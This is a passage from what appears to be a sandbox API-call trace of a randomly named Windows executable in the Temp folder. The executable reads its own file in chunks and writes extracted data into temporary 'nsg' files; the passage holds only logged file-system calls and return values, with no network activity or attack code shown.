returned="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"" [0029.867] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0029.868] GetTempPathA (in: nBufferLength=0x400, lpBuffer=0x42a400 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\") returned 0x25 [0029.871] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 36 [0029.871] lstrcatA (in: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\" [0029.871] CreateDirectoryA (lpPathName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0029.871] GetLastError () returned 0xb7 [0029.871] GetTickCount () returned 0x1a12c [0029.871] GetTempFileNameA (in: lpPathName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\", lpPrefixString="nsg", uUnique=0x0, lpTempFileName=0x42a000 | out: lpTempFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsgA12C.tmp" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsga12c.tmp")) returned 0xa12c [0029.872] DeleteFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsgA12C.tmp" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsga12c.tmp")) returned 1 [0029.872] GetTickCount () returned 0x1a12c [0029.872] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x42ac00, nSize=0x400 | out: lpFilename="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vworbzlbc.exe")) returned 0x32 [0029.872] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vworbzlbc.exe")) returned 0x20 [0029.872] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vworbzlbc.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0x1fc [0029.872] lstrcpynA (in: lpString1=0x429c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe" [0029.872] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe") returned 50 [0029.873] lstrcpynA (in: lpString1=0x42b000, lpString2="vwOrbzLbc.exe", iMaxLength=1024 | out: lpString1="vwOrbzLbc.exe") returned="vwOrbzLbc.exe" [0029.873] GetFileSize (in: hFile=0x1fc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x26f2f [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.873] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.874] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.875] ReadFile (in: hFile=0x1fc, lpBuffer=0x4168f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x4168f0*, lpNumberOfBytesRead=0x19fca0*=0x200, lpOverlapped=0x0) returned 1 [0029.876] GetTickCount () returned 0x1a12c [0029.876] GetTempFileNameA (in: lpPathName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\", lpPrefixString="nsg", uUnique=0x0, lpTempFileName=0x19fcbc | out: lpTempFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsgA12D.tmp" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsga12d.tmp")) returned 0xa12d [0029.876] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsgA12D.tmp" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsga12d.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x4000100, hTemplateFile=0x0) returned 0x1f0 [0029.876] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=39964, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9c1c [0029.876] GetTickCount () returned 0x1a12c [0029.877] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=39964, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9c1c [0029.877] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0029.877] ReadFile (in: hFile=0x1fc, lpBuffer=0x4128d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fc64, lpOverlapped=0x0 | out: lpBuffer=0x4128d8*, lpNumberOfBytesRead=0x19fc64*=0x4000, lpOverlapped=0x0) returned 1 [0029.895] WriteFile (in: hFile=0x1f0, lpBuffer=0x40a8d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x19fc70, lpOverlapped=0x0 | out: lpBuffer=0x40a8d8*, lpNumberOfBytesWritten=0x19fc70*=0x8000, lpOverlapped=0x0) returned 1 [0029.898] WriteFile (in: hFile=0x1f0, lpBuffer=0x40a8d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x19fc70, lpOverlapped=0x0 | out: lpBuffer=0x40a8d8*, lpNumberOfBytesWritten=0x19fc70*=0x8000, lpOverlapped=0x0) returned 1 [0029.899] WriteFile (in: hFile=0x1f0, lpBuffer=0x40a8d8*, nNumberOfBytesToWrite=0x36e0, lpNumberOfBytesWritten=0x19fc70, lpOverlapped=0x0 | out: lpBuffer=0x40a8d8*, lpNumberOfBytesWritten=0x19fc70*=0x36e0, lpOverlapped=0x0) returned 1 [0029.899] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0029.899] ReadFile (in: hFile=0x1f0, lpBuffer=0x19fca0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19fc88, lpOverlapped=0x0 | out: lpBuffer=0x19fca0*, lpNumberOfBytesRead=0x19fc88*=0x4, lpOverlapped=0x0) returned 1 [0029.899] GetTickCount () returned 0x1a14c [0029.899] ReadFile (in: 